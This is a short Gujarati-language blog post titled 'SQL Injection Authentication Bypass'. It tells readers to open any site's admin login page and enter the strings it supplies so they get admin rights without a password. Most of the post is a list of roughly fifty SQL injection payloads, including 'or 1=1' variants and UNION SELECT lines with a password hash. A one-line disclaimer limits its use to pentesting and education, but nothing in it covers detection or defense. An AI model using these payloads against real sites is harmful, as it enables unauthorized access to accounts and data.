SQL Injection Authentication Bypass

હેલો ઈન્ટરનેટ મારુ નામ કરણ પરમાર છે, અને આજે હું તમને admin login panel કેવી રીતે પાસવર્ડ વગર લોગીન કરવું તે બતાવીશ જેથી  જો તમારી site માં આવી વર્નાબીલીટી હોય તો તમે શોધી શકો , આ પોસ્ટ  જો તમને સારી લાગે તો જરૂર comment  બોક્સ માં લખી આપશો, તો ચાલો સારું કરીયે.(આનો ઉપયોગ ફક્ત pentesting અને education માટે જ કરવો ).

SQL Injection Authentication Bypass :

આ એક સિમ્પલ ટ્રીક છે જેમાં તમારે કોઈ પણ admin પેનલ ના લોગીન પગે માં જવાનું રહેશે , Example - 

https://www.example.com/admin/login , URL  માં એડમીન લોગીન પેગ હશે, તેમાં તમારે નીચે આપેલા કોડ નો યુઝ કરવો Auth Bypass માટે, જો site માં વર્નાબીલીટી હશે તો તે એડમીન રાઈટ્સ થી લોગીન થઇ જશે। (Username અને Password માં same કોડ યુઝ કરવો,અથવા Username માં admin અને પાસવર્ડ માં નીચે નો કોડ યૂઝ કરવો।

Site Example 

-- બીજા કોડ તમે use કરી સકો છો , જે નીચે આપેલા છે 

or 1=1

or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

Happy Ethical Hacking . તમારો આભાર અને ફરી પધાર જો.